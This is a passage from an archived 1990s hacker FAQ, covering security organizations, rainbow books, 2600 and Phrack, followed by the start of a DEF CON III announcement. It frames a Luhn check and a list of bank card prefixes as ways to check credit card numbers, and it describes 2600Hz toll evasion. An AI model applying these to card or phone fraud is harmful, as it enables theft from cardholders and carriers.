  9867. Annual dues for individual members are $42 for employed professionals,
  9868. $10.50 for students, and $21 for others.  We appreciate activists, but
  9869. members who cannot contribute their time are also welcome.
  9870.  
  9871. To contact the League, phone (617) 243-4091, send Internet mail to the
  9872. address league@prep.ai.mit.edu, or write to:
  9873.  
  9874. League for Programming Freedom
  9875. 1 Kendall Square #143
  9876. P.O. Box 9171
  9877. Cambridge, MA 02139 USA
  9878.  
  9879.  
  9880. SotMesc
  9881. ~~~~~~~
  9882. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  9883. cohesion of the computing society.  By promoting computer education,
  9884. liberties and efficiency, we believe we can secure freedoms for all
  9885. computer users while retaining privacy.
  9886.  
  9887. SotMesc maintains the CSP Internet mailing list, the SotMesc
  9888. Scholarship Fund, and the SotMesc Newsletter.
  9889.  
  9890. The SotMESC is financed partly by membership fees, and donations, but
  9891. mostly by selling hacking, cracking, phreaking, electronics, internet,
  9892. and virus information and programs on disk and bound paper media.
  9893.  
  9894. SotMesc memberships are $20 to students and $40 to regular members.
  9895.  
  9896. SotMESC
  9897. P.O. Box 573
  9898. Long Beach, MS  39560
  9899.  
  9900.  
  9901. Computer Emergency Response Team (CERT
  9902. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9903.  
  9904. CERT is the Computer Emergency Response Team that was formed by the
  9905. Defense Advanced Research Projects Agency (DARPA) in November 1988 in
  9906. response to the needs exhibited during the Internet worm incident.
  9907. The CERT charter is to work with the Internet community to facilitate
  9908. its response to computer security events involving Internet hosts, to
  9909. take proactive steps to raise the community's awareness of computer
  9910. security issues, and to conduct research targeted at improving the
  9911. security of existing systems.
  9912.  
  9913. CERT products and services include 24-hour technical assistance for
  9914. responding to computer security incidents, product vulnerability
  9915. assistance, technical documents, and seminars.  In addition, the team
  9916. maintains a number of mailing lists (including one for CERT
  9917. advisories) and provides an anonymous FTP server:  cert.org
  9918. (192.88.209.5), where security-related documents, past CERT
  9919. advisories, and tools are archived.
  9920.  
  9921. CERT contact information:
  9922.  
  9923. U.S. mail address
  9924.   CERT Coordination Center
  9925.   Software Engineering Institute
  9926.   Carnegie Mellon University
  9927.   Pittsburgh, PA 15213-3890
  9928.   U.S.A.
  9929.  
  9930. Internet E-mail address
  9931.   cert@cert.org
  9932.  
  9933. Telephone number
  9934.   (412)268-7090 (24-hour hotline)
  9935.   CERT Coordination Center personnel answer
  9936.   7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
  9937.   emergencies during other hours.
  9938.  
  9939. FAX number
  9940.   (412)268-6989
  9941.  
  9942.  
  9943. 15. Where can I purchase a magnetic stripe encoder/decoder?
  9944.  
  9945. CPU Advance
  9946. PO Box 2434
  9947. Harwood Station
  9948. Littleton, MA  01460
  9949. (508)624-4819 (Fax)
  9950.  
  9951. Omron Electronics, Inc.
  9952. One East Commerce Drive
  9953. Schaumburg, IL  60173
  9954. (800)556-6766 (Voice)
  9955. (708)843-7787 (Fax)
  9956.  
  9957. Security Photo Corporation
  9958. 1051 Commonwealth Avenue
  9959. Boston, MA 02215
  9960. (800)533-1162 (Voice)
  9961. (617)783-3200 (Voice)
  9962. (617)783-1966 (Voice)
  9963.  
  9964. Timeline Inc,
  9965. 23605 Telo Avenue
  9966. Torrence, CA 90505
  9967. (800)872-8878 (Voice)
  9968. (800)223-9977 (Voice)
  9969.  
  9970. Alltronics
  9971. 2300 Zanker Road
  9972. San Jose CA 95131
  9973. (408) 943-9774 Voice
  9974. (408) 943-9776 Fax
  9975. (408) 943-0622 BBS
  9976. Part Number: 92U067
  9977.  
  9978. Atalla Corp
  9979. San Jose, CA
  9980. (408) 435-8850
  9981.  
  9982.  
  9983. 16. What are the rainbow books and how can I get them?
  9984.  
  9985. Orange Book
  9986. DoD 5200.28-STD
  9987. Department of Defense Trusted Computer System Evaluation Criteria
  9988.  
  9989. Green Book
  9990. CSC-STD-002-85
  9991. Department of Defense Password Management Guideline
  9992.  
  9993. Yellow Book
  9994. CSC-STD-003-85
  9995. Computer Security Requirements -- Guidance for Applying the Department
  9996. of Defense Trusted Computer System Evaluation Criteria in Specific
  9997. Environments
  9998.  
  9999. Yellow Book
  10000. CSC-STD-004-85
  10001. Technical Rationale Behind CSC-STD-003-85: Computer Security
  10002. Requirements.  Guidance for Applying the Department of Defense Trusted
  10003. Computer System Evaluation Criteria in Specific Environments.
  10004.  
  10005. Tan Book
  10006. NCSC-TG-001
  10007. A Guide to Understanding Audit in Trusted Systems
  10008.  
  10009. Bright Blue Book
  10010. NCSC-TG-002
  10011. Trusted Product Evaluation - A Guide for Vendors
  10012.  
  10013. Neon Orange Book
  10014. NCSC-TG-003
  10015. A Guide to Understanding Discretionary Access Control in Trusted
  10016. Systems
  10017.  
  10018. Teal Green Book
  10019. NCSC-TG-004
  10020. Glossary of Computer Security Terms
  10021.  
  10022. Red Book
  10023. NCSC-TG-005
  10024. Trusted Network Interpretation of the Trusted Computer System
  10025. Evaluation Criteria
  10026.  
  10027. Orange Book
  10028. NCSC-TG-006
  10029. A Guide to Understanding Configuration Management in Trusted Systems
  10030.  
  10031. Burgundy Book
  10032. NCSC-TG-007
  10033. A Guide to Understanding Design Documentation in Trusted Systems
  10034.  
  10035. Dark Lavender Book
  10036. NCSC-TG-008
  10037. A Guide to Understanding Trusted Distribution in Trusted Systems
  10038.  
  10039. Venice Blue Book
  10040. NCSC-TG-009
  10041. Computer Security Subsystem Interpretation of the Trusted Computer
  10042. System Evaluation Criteria
  10043.  
  10044. Aqua Book
  10045. NCSC-TG-010
  10046. A Guide to Understanding Security Modeling in Trusted Systems
  10047.  
  10048. Dark Red Book
  10049. NCSC-TG-011
  10050. Trusted Network Interpretation Environments Guideline -- Guidance for
  10051. Applying the Trusted Network Interpretation
  10052.  
  10053. Pink Book
  10054. NCSC-TG-013
  10055. Rating Maintenance Phase -- Program Document
  10056.  
  10057. Purple Book
  10058. NCSC-TG-014
  10059. Guidelines for Formal Verification Systems
  10060.  
  10061. Brown Book
  10062. NCSC-TG-015
  10063. A Guide to Understanding Trusted Facility Management
  10064.  
  10065. Yellow-Green Book
  10066. NCSC-TG-016
  10067. Guidelines for Writing Trusted Facility Manuals
  10068.  
  10069. Light Blue
  10070. NCSC-TG-017
  10071. A Guide to Understanding Identification and Authentication in Trusted
  10072. Systems
  10073.  
  10074. Light Blue Book
  10075. NCSC-TG-018
  10076. A Guide to Understanding Object Reuse in Trusted Systems
  10077.  
  10078. Blue Book
  10079. NCSC-TG-019
  10080. Trusted Product Evaluation Questionnaire
  10081.  
  10082. Gray Book
  10083. NCSC-TG-020A
  10084. Trusted Unix Working Group (TRUSIX) Rationale for Selecting
  10085. Access Control List Features for the Unix System
  10086.  
  10087. Lavender Book
  10088. NCSC-TG-021
  10089. Trusted Data Base Management System Interpretation of the Trusted
  10090. Computer System Evaluation Criteria
  10091.  
  10092. Yellow Book
  10093. NCSC-TG-022
  10094. A Guide to Understanding Trusted Recovery in Trusted Systems
  10095.  
  10096. Bright Orange Book
  10097. NCSC-TG-023
  10098. A Guide to Understandng Security Testing and Test Documentation in
  10099. Trusted Systems
  10100.  
  10101. Purple Book
  10102. NCSC-TG-024  (Volume 1/4)
  10103. A Guide to Procurement of Trusted Systems: An Introduction to
  10104. Procurement Initiators on Computer Security Requirements
  10105.  
  10106. Purple Book
  10107. NCSC-TG-024 (Volume 2/4)
  10108. A Guide to Procurement of Trusted Systems: Language for RFP
  10109. Specifications and Statements of Work - An Aid to Procurement
  10110. Initiators
  10111.  
  10112. Purple Book
  10113. NCSC-TG-024  (Volume 3/4)
  10114. A Guide to Procurement of Trusted Systems: Computer Security Contract
  10115. Data Requirements List and Data Item Description Tutorial
  10116.  
  10117. +Purple Book
  10118. +NCSC-TG-024  (Volume 4/4)
  10119. +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
  10120. +Proposal Document - An Aid to Procurement Initiators and Contractors
  10121.  
  10122. Green Book
  10123. NCSC-TG-025
  10124. A Guide to Understanding Data Remanence in Automated Information
  10125. Systems
  10126.  
  10127. Hot Peach Book
  10128. NCSC-TG-026
  10129. A Guide to Writing the Security Features User's Guide for Trusted Systems
  10130.  
  10131. Turquiose Book
  10132. NCSC-TG-027
  10133. A Guide to Understanding Information System Security Officer
  10134. Responsibilities for Automated Information Systems
  10135.  
  10136. Violet Book
  10137. NCSC-TG-028
  10138. Assessing Controlled Access Protection
  10139.  
  10140. Blue Book
  10141. NCSC-TG-029
  10142. Introduction to Certification and Accreditation
  10143.  
  10144. Light Pink Book
  10145. NCSC-TG-030
  10146. A Guide to Understanding Covert Channel Analysis of Trusted Systems
  10147.  
  10148. C1 Technical Report-001
  10149. Computer Viruses: Prevention, Detection, and Treatment
  10150.  
  10151. *C Technical Report 79-91
  10152. *Integrity in Automated Information Systems
  10153.  
  10154. *C Technical Report 39-92
  10155. *The Design and Evaluation of INFOSEC systems: The Computer Security
  10156. *Contributions to the Composition Discussion
  10157.  
  10158. NTISSAM COMPUSEC/1-87
  10159. Advisory Memorandum on Office Automation Security Guideline
  10160.  
  10161. --
  10162.  
  10163. You can get your own free copy of any or all of the books by writing
  10164. or calling:
  10165.  
  10166.        INFOSEC Awareness Division
  10167.        ATTN: X711/IAOC
  10168.        Fort George G. Meade, MD  20755-6000
  10169.  
  10170.        Barbara Keller
  10171.        (410) 766-8729
  10172.  
  10173. If you ask to be put on the mailing list, you'll get a copy of each new
  10174. book as it comes out (typically a couple a year).
  10175.  
  10176. [* == I have not personally seen this book]
  10177. [+ == I have not personally seen this book, and I believe it may not]
  10178. [     be available]
  10179.  
  10180.  
  10181.  
  10182.  
  10183. Section D: 2600
  10184. ~~~~~~~~~~~~~~~
  10185.  
  10186. 01. What is alt.2600?
  10187.  
  10188. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  10189. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  10190. game machine.  Len@netsys.com created the group on Emmanuel
  10191. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  10192. Magazine. Following the barrage of postings about the Atari machine to
  10193. alt.2600, an alt.atari.2600 was created to divert all of the atari
  10194. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  10195. rec.games.video.classic.
  10196.  
  10197.  
  10198. 02. What does "2600" mean?
  10199.  
  10200.     2600Hz was a tone that was used by early phone phreaks (or
  10201. phreakers) in the 80's, and some currently.  If the tone was sent down the
  10202. line at the proper time, one could get away with all sorts of fun stuff.  
  10203.  
  10204. A note from Emmanuel Goldstein:
  10205.     
  10206. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  10207. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  10208. step towards exploring the network.  If you were successful at 
  10209. getting a toll call to drop, then billing would stop at that
  10210. point but there would be billing for the number already dialed
  10211. up until the point of seizure.  800 numbers and long distance
  10212. information were both free in the past and records of who called
  10213. what were either non-existent or very obscure with regards to
  10214. these numbers.  This, naturally, made them more popular than
  10215. numbers that showed up on a bill, even if it was only for
  10216. a minute.  Today, many 800 numbers go overseas, which provides
  10217. a quick and free way into another country's phone system
  10218. which may be more open for exploration."
  10219.  
  10220.  
  10221. 03. Are there on-line versions of 2600 available?
  10222.  
  10223.     No.
  10224.  
  10225.  
  10226. 04. I can't find 2600 at any bookstores.  What can I do?
  10227.  
  10228. Subscribe.  Or, let 2600 know via the subscription address that you
  10229. think 2600 should be in the bookstore.  Be sure to include the
  10230. bookstores name and address.
  10231.  
  10232.  
  10233. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  10234.  
  10235. A note from Emmanuel Goldstein:
  10236.  
  10237.   We've been selling 2600 at the same newsstand price ($4) since 1988
  10238.   and we hope to keep it at that price for as long as we can get away
  10239.   with it. At the same time, $21 is about the right price to cover
  10240.   subscriber costs, including postage and record keeping, etc. People
  10241.   who subscribe don't have to worry about finding an issue someplace,
  10242.   they tend to get issues several weeks before the newsstands get
  10243.   them, and they can take out free ads in the 2600 Marketplace.
  10244.  
  10245.   This is not uncommon in the publishing industry.  The NY Times, for
  10246.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  10247.   door.
  10248.  
  10249.  
  10250. Section E: Phrack Magazine
  10251. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  10252.  
  10253. 01. What Is Phrack Magazine?
  10254.  
  10255.     Phrack Magazine is one of the longest running electronic-based publications
  10256.     in the world.  Originally founded in 1985 by Knight Lightning and Taran
  10257.     King, it has survived several incarnations of editors and still remains
  10258.     true to its underground roots.  Since its inception, Phrack has been
  10259.     providing the hacker community with information on operating systems,
  10260.     networking technologies and telephony, as well as relaying human interest
  10261.     features of interest to the international computer underground.
  10262.  
  10263.     During its lifetime, Phrack has always been at the center of controversy.
  10264.     Since the magazine has always been openly available, it presented law
  10265.     enforcement officials with what they percieved to be a direct link into
  10266.     the secret society of computer hackers.  Not truly understnding either
  10267.     the the spirit of the magazine or the community for which it was written,
  10268.      Federal Agents and Prosecutors began to target Phrack Magazine and those
  10269.     affiliated with it.
  10270.  
  10271.     "The Hacker Crackdown" by Bruce Sterling relays the details surrounding
  10272.     some of these events.
  10273.  
  10274.     Phrack Magazine is now in its 10th year of publication, and is registered
  10275.     with the Library of Congress as ISSN 1068-1035, and is protected by
  10276.     US Copyright Law.
  10277.  
  10278. 02. How can I reach Phrack Magazine?
  10279.  
  10280.     You can reach Phrack by email at:  phrack@well.com, phrack@fc.net or
  10281.     phrackmag@aol.com.  These addresses are listed in order of
  10282.     preference.  Only AOL users should email the phrackmag@aol.com.
  10283.  
  10284.     Phrack can be reached by the postal service at:
  10285.  
  10286.     Phrack Magazine
  10287.     603 W. 13th #1A-278
  10288.     Austin, TX 78701
  10289.  
  10290. 03. Who Publishes Phrack?
  10291.  
  10292.    Phrack Magazine is published by Chris Goggans, aka Erik Bloodaxe.  It is
  10293.    hobbled together, touched up, spell checked and compressed on an overworked
  10294.    486-66.  It is then ftp'ed over to a BSDI UNIX machine where it is sent to
  10295.    the masses.
  10296.  
  10297. 04. How Often Does Phrack Go Out?
  10298.  
  10299.     Phrack goes out roughly quarterly.  It is often sent out later than every
  10300.     three months due to other more demanding obligations faced by its editor.
  10301.     The regularity of Phrack is really based upon the amount of information
  10302.     sent in.  Phrack depends solely upon submissions to get published at all.
  10303.  
  10304. 05. How Do I Subscribe?
  10305.  
  10306.     To subscribe to Phrack magazine, merely email phrack@well.com and ask to
  10307.     be placed on the mailing list.
  10308.  
  10309.     Any encrypted subscriptions requests will be ignored.
  10310.  
  10311.     Phrack will not accept subscription requests from any anonymous remailers or
  10312.     from sites in the fidonet domain.  The anonymous remailers consistently
  10313.     bounce our mailings causing a big headache, so we won't use them.  The
  10314.     fidonet domain administrators have asked us not to mail Phrack to fido users,
  10315.     because of the huge load it places on their outgoing spools (costing them a
  10316.     lot of money to send).
  10317.  
  10318. 06. Why Don't I Get Any Response When I E-mail Phrack?
  10319.  
  10320.     Because of the high volume of mail sent to the Phrack email address,
  10321.     not everyone gets a response.  All subscription requests are saved and
  10322.     added to the master list, but there is no automatic reply.  All other
  10323.     messages are responded to as they are read, with the exception of PGP'd
  10324.     messages.  All PGP'd email is stored for later decryption, and is almost
  10325.     never responded to, unless it is incredibly urgent.
  10326.  
  10327. 07. Does Phrack Cost Money?
  10328.  
  10329.     Phrack Magazine charges a registration fee of $100.00 per user for any
  10330.     professional use of the magazine and the information contained therein.
  10331.     Information regarding this registration fee is contained at the beginning
  10332.     of every issue of Phrack.
  10333.  
  10334. 08. How Can I Submit Articles?
  10335.  
  10336.     Articles are both wanted and needed.  Phrack only exists if people write
  10337.     for it.  There is no regular writing staff, there is only the editor, who
  10338.     cannot write the entire thing himself.
  10339.  
  10340.     Articles can be sent to Phrack via email or snailmail (on paper or
  10341.     IBM-compatible diskette).  Articles should be in ASCII text format.  Do
  10342.     not include any clever graphics or ANSI art.  You can use Phrack's PGP key
  10343.     to encrypt articles, but send the files in the ASCII armor format.
  10344.  
  10345.     Please try to avoid sending files as MIME-compliant mail attachments.
  10346.  
  10347. 09. What Is Phrack's PGP Key?
  10348.  
  10349.     -----BEGIN PGP PUBLIC KEY BLOCK-----
  10350.     Version: 2.6
  10351.  
  10352.     mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
  10353.     Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
  10354.     Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
  10355.     tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
  10356.     =evjv
  10357.     -----END PGP PUBLIC KEY BLOCK-----
  10358.  
  10359. 10. Where Can I Get Back Issues?
  10360.  
  10361.    Back issues of Phrack are found on many bulletin boards around the globe.
  10362.    The only OFFICIAL Phrack Magazine distribution site is our ftp archive
  10363.    at ftp.fc.net in /pub/phrack.  There are NO official distribution sites
  10364.    other than this one, nor will there ever be.  We don't want to play
  10365.    favorites and let one particular BBS call itself an "official" site while
  10366.    another isn't.  Therefore, there will be no "official" sites except those
  10367.    archived by Phrack itself.
  10368.  
  10369.    You can also get back issues on the World Wide Web by connecting to:
  10370.    http://www.fc.net/phrack.html
  10371.  
  10372.    This URL allows users to view issues online, or pull them down for
  10373.    later viewing.
  10374.  
  10375.    Any users without net access can send diskettes and postage to the
  10376.    Phrack Postal Address given above, and request back issues to be
  10377.    sent via the postal system.
  10378.  
  10379. Section F: Miscellaneous
  10380. ~~~~~~~~~~~~~~~~~~~~~~~~
  10381.  
  10382. 01. What does XXX stand for?
  10383.  
  10384. TLA     Three Letter Acronym
  10385.  
  10386. ACL     Access Control List
  10387. PIN     Personal Identification Number
  10388. TCB     Trusted Computing Base
  10389.  
  10390. ALRU    Automatic Line Record Update
  10391. AN      Associated Number
  10392. ARSB    Automated Repair Service Bureau
  10393. ATH     Abbreviated Trouble History
  10394. BOC     Bell Operating Company
  10395. BOR     Basic Output Report
  10396. BOSS    Business Office Servicing System
  10397. CA      Cable
  10398. COE     Central Office Equipment
  10399. COSMOS  Computer System for Main Frame Operations
  10400. CMC     Construction Maintenance Center
  10401. CNID    Calling Number IDentification
  10402. CO      Central Office
  10403. COCOT   Customer Owned Coin Operated Telephone
  10404. CRSAB   Centralized Repair Service Answering Bureau
  10405. DDD     Direct Distance Dialing
  10406. ECC     Enter Cable Change
  10407. LD      Long Distance
  10408. LMOS    Loop Maintenance Operations System
  10409. MLT     Mechanized Loop Testing
  10410. NPA     Numbering Plan Area
  10411. POTS    Plain Old Telephone Service
  10412. RBOC    Regional Bell Operating Company
  10413. RSB     Repair Service Bureau
  10414. SS      Special Service
  10415. TAS     Telephone Answering Service
  10416. TH      Trouble History
  10417. TREAT   Trouble Report Evaluation and Analysis Tool
  10418.  
  10419. LOD     Legion of Doom
  10420. HFC     Hell Fire Club
  10421. TNO     The New Order
  10422.  
  10423. ACiD    Ansi Creators in Demand
  10424. CCi     Cybercrime International
  10425. FLT     Fairlight
  10426. iCE     Insane Creators Enterprise
  10427. iNC     International Network of Crackers
  10428. NTA     The Nocturnal Trading Alliance
  10429. PDX     Paradox
  10430. PE      Public Enemy
  10431. PSY     Psychose
  10432. QTX     Quartex
  10433. RZR     Razor (1911)
  10434. S!P     Supr!se Productions
  10435. TDT     The Dream Team
  10436. THG     The Humble Guys
  10437. THP     The Hill People
  10438. TRSI    Tristar Red Sector Inc.
  10439. UUDW    Union of United Death Workers
  10440.  
  10441.  
  10442. 02. How do I determine if I have a valid credit card number?
  10443.  
  10444. Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
  10445. this algorithm is to catch data entry errors, but it does double duty
  10446. here as a weak security tool.
  10447.  
  10448. For a card with an even number of digits, double every odd numbered
  10449. digit and subtract 9 if the product is greater than 9.  Add up all the
  10450. even digits as well as the doubled-odd digits, and the result must be
  10451. a multiple of 10 or it's not a valid card.  If the card has an odd
  10452. number of digits, perform the same addition doubling the even numbered
  10453. digits instead.
  10454.  
  10455.  
  10456. 03. What bank issued this credit card?
  10457.  
  10458. 1033    Manufacturers Hanover Trust
  10459. 1035    Citibank
  10460. 1263    Chemical Bank
  10461. 1665    Chase Manhattan
  10462. 4024    Bank of America
  10463. 4128    Citicorp
  10464. 4209    New Era Bank
  10465. 4302    HHBC
  10466. 4310    Imperial Savings
  10467. 4313    MBNA
  10468. 4317    California Federal
  10469. 5282    Wells Fargo
  10470. 5424    Citibank
  10471. 5410    Wells Fargo
  10472. 5432    Bank of New York
  10473. 6017    MBNA
  10474.  
  10475.  
  10476. 04. What are the ethics of hacking?
  10477.  
  10478. An excerpt from: Hackers: Heroes of the Computer Revolution
  10479.                           by Steven Levy
  10480.  
  10481.         Access to computers -- and anything which might teach you
  10482.         something about the way the world works -- should be unlimited
  10483.         and total. Always yield to the Hands-On imperative.
  10484.  
  10485.         All information should be free.
  10486.  
  10487.         Mistrust Authority.  Promote Decentralization.
  10488.  
  10489.         Hackers should be judged by their hacking, not bogus criteria
  10490.         such as degrees, age, race, or position.
  10491.  
  10492.         You can create art and beauty on a computer.
  10493.  
  10494.         Computers can change your life for the better.
  10495.  
  10496.  
  10497. 04. Where can I get a copy of the alt.2600/#hack FAQ?
  10498.  
  10499. Get it on FTP at:
  10500. rahul.net      /pub/lps
  10501. rtfm.mit.edu   /pub/usenet-by-group/alt.2600
  10502. ftp.clark.net  /pub/jcase
  10503.  
  10504. Get it on the World Wide Web at:
  10505. http://dfw.net/~aleph1
  10506. http://www.engin.umich.edu/~jgotts/hack-faq.html
  10507. http://www.phantom.com/~king
  10508.  
  10509. Get it from these BBS's:
  10510. Hacker's Haven (303)343-4053
  10511.  
  10512.  
  10513.  
  10514.  
  10515.  
  10516. EOT
  10517.                               ==Phrack Magazine==
  10518.  
  10519.                  Volume Six, Issue Forty-Seven, File 9 of 22
  10520.  
  10521. -----BEGIN PGP SIGNED MESSAGE-----
  10522.  
  10523.                 DEF CON III Convention Update #1.31 (04.04.95)
  10524.               August 4-6th 1995 @ the Tropicana in Las Vegas
  10525.  
  10526. XXXXXXXXXXXXXXXXXXXXXXXX XX      DEF CON III Initial Convention Announcement
  10527. XXXXXXXxxxxXXXXXXXXXXXXXXX XX    DEF CON III Initial Convention Announcement
  10528. XXXXXXxxxxxxXXXXXX  X    X       DEF CON III Initial Convention Announcement
  10529. XXXXXxxxxxxxxXXXXXXX  X          DEF CON III Initial Convention Announcement
  10530. XXXXxxxxxxxxxxXXXX XXXXXXXXX     DEF CON III Initial Convention Announcement
  10531. XXXxxxxxxxxxxxxXXXXXXXXXX X      DEF CON III Initial Convention Announcement
  10532. XXxxxxxxxxxxxxxxXXXXXX  XX  X    DEF CON III Initial Convention Announcement
  10533. XXXxxxxxxxxxxxxXXXXXXXX          DEF CON III Initial Convention Announcement
  10534. XXXXxxxxxxxxxxXXXXXXXX X XX      DEF CON III Initial Convention Announcement
  10535. XXXXXxxxxxxxxXXXXXXXXXX  XX X    DEF CON III Initial Convention Announcement
  10536. XXXXXXxxxxxxXXXXXXXXX X          DEF CON III Initial Convention Announcement
  10537. XXXXXXXxxxxXXXXXXXXXXXXXXX       DEF CON III Initial Convention Announcement
  10538. XXXXXXXXXXXXXXXXXXXXXXXXXXXX X   DEF CON III Initial Convention Announcement
  10539.  
  10540. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  10541. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  10542.  
  10543. This is _not_ the professional sounding announcement.  Use that one to con
  10544. your boss / employers out of the cost of the trip.  The professional
  10545. announcement will be available on the FTP site and other more serious mailing
  10546. lists and news groups, etc.  This is the k-RaD kriminal shout out to all u
  10547. el1te hacker types that aren't in jail to attend 'da def con.  werd.
  10548.  
  10549. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  10550. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  10551.  
  10552. What's this?  This is an initial announcement and invitation to DEF CON III,
  10553. a convention for the "underground" elements of the computer culture.  We try
  10554. to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
  10555. Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties
  10556. Groups, CypherPunks, Futurists, Artists, Criminally Insane, Hearing Impaired.
  10557.  
  10558. WHO:   You know who you are, you shady characters.
  10559. WHAT:  A convention for you to meet, party, and listen to some speeches
  10560.        that you would normally never get to hear from some k-rad people.
  10561. WHEN:  August 4, 5, 6 - 1995 (Speaking on the 5th and 6th)
  10562. WHERE: Las Vegas, Nevada @ The Tropicana Hotel
  10563.  
  10564. So you heard about DEF CON II, and want to hit part III?  You heard about the
  10565. parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
  10566. check it out in person?  You want to do weird shit _away_ from the hotel
  10567. where you can't get me in trouble?  Then you're just the person to attend!
  10568.  
  10569. Sure it's great to meet and party with fellow hackers, but besides that we
  10570. try to provide information and speakers in a forum that can't be found at
  10571. other conferences.  While there is an initial concern that this is just
  10572. another excuse for the evil hackers to party and wreak havoc, it's just
  10573. not the case.  People come to DEF CON for information and for making
  10574. contacts.  We strive to distinguish this convention from others in that
  10575. respect.  Plus this year we have official DEF CON GOONS(c) who will pummel
  10576. you until you pass out should you cause problems for other con.friendly
  10577. people!  Big Brother loves you!
  10578.  
  10579. What's been said (Only the good stuff will be quoted, of course)
  10580.  
  10581.   Stevyn - "What can eye say, it was intense! . . . the whole con just
  10582.      kicked ass!  I totally recommend you check out the next one."
  10583.  
  10584.   Gail Thackeray, Prosecutor, "It's partly an entertaining party, it's
  10585.      partly a fashion statement.  But it's mostly something about which the
  10586.      business world has no clue."
  10587.  
  10588.   Wendy Murdock, Boardwatch, "Def Con represents the tug-of-war that has
  10589.      always been present - people strive to get that which is just out of
  10590.      reach, aggravating governments and breaking rules in the process."
  10591.  
  10592. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10593.  
  10594. WHERE IT IS:
  10595.  
  10596. The Tropicana has rooms reserved for the convention.  Rooms are expensive.
  10597. They are even more expensive if you don't book under the convention.  If it
  10598. is to expensive for you, please see the section below on Las Vegas WWW sites
  10599. that can provide you with information on other nearby hotels that are cheaper.
  10600. Check-in is 3 pm, check-out time is 12 noon.  Remember there is an 8% sales
  10601. tax in Vegas.
  10602.  
  10603.                65$ Single or Double room, Midweek (Monday - Thursday)
  10604.                90$ Single or Double room, Weekend (Friday - Sunday)
  10605.                350$ One-Bedroom Suite (Call for Availability)
  10606.  
  10607.      The Tropicana, 3801 Las Vegas Blvd. So., Las Vegas, Nevada, 89109
  10608.           (702) 739-2581 or (800) 468-9494 or (702) 739-2448 (Fax)
  10609.  
  10610. Held in three conference rooms at the Tropicana hotel in Las Vegas, DEF CON
  10611. promises to be interesting.  The Tropicana has a huge pool (largest in the
  10612. world?  Anyway, lots of cool movies have been filmed with this pool in them)
  10613. and in August Vegas should be about 100(f) degrees at one in the morning.
  10614. What do you care?  You'll be wired on caffeine and not sleeping anyway.  There
  10615. are numerous attractions in town from the strip bars to the local COs in case
  10616. you seek distraction.
  10617.  
  10618. The Tropicana is located right on the "Strip" with the other three corners of
  10619. the street occupied by the MGM Grand (Largest hotel in the world), the
  10620. Excalibur, and the Luxor (The big sense-net pyramid).  If you can afford it
  10621. I totally recommend spending some extra time in town.. there are too many
  10622. cool things to do, especially if you have never visited.  Heck, last time I
  10623. got to rent and fire uzi's and MP-5 machine guns (OK, so you can do that for
  10624. cRacK in Los Angeles) see some strippers, and drink 1$ bottles of imported
  10625. beer.  What a place!  Now you know why I chose Vegas for a location.
  10626.  
  10627.  
  10628.  
  10629.  
  10630.  
  10631.  
  10632.  
  10633.  
  10634.  
  10635.                                SPECIAL EVENTS
  10636.  
  10637. This year there will be a number of special events going down, including:
  10638.  
  10639. [> Hacker Jeopardy       [> Spot the Fed Contest       [> Voice bridge
  10640. [> Giveaways             [> A Red Box Creation Contest [> A Video Room
  10641. [> Cool Video Shit       [> Scavenger Contest          [> Who knows?
  10642. [> Group Battle Tech simulations at Virtual World.
  10643.  
  10644.                                    COSTS
  10645.  
  10646. The price of admission will be 30$ in advance (See the end of this
  10647. announcement the address to pre-register to) or 40$ at the door.  This will
  10648. include your goovie 24bit color name tag and a conference program.
  10649.  
  10650. Don't forget to factor in Hotel costs, (The more people you crash with, the
  10651. cheaper it is) gas, food, gambling, booze, strippers, bail, etc.
  10652.  
  10653. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10654.  
  10655.                                    SPEAKERS
  10656.  
  10657. This is a partial list of speakers for this year.  More are being invited
  10658. or waiting to make plans.  As this list changes further announcements will
  10659. be made.  This should give you a flavor or what to expect, though.
  10660.  
  10661. [> Bruce Schneier, Author of "Applied Cryptography." TOPIC: Will speak
  10662.    on issues surrounding cryptography, digital authentication, digital cash,
  10663.    and will answer questions from the audience.
  10664.  
  10665. [> John Perry Barlow, Visionary, etc.  If you don't know who this guy is
  10666.    you definately need to attend.  TOPIC: TBA
  10667.  
  10668. [> Winn Schwartau, Author of "Information Warfare" and "Terminal Compromise"
  10669.    is a consultant to government and the private sector regarding enterprise
  10670.    and national security concerns.  TOPICS: "Information Warfare, the year
  10671.    in review" (Comedic) and "Tempest Attack Videos."
  10672.  
  10673. [> Len Rose AKA Terminus.  After the legal fiasco Len faced years ago (as
  10674.    partially chronicled in "The Hacker Crackdown.") this will be his first
  10675.    chance to speak of his experiences without the threat of having his parole
  10676.    revoked.  TOPIC: TBA
  10677.  
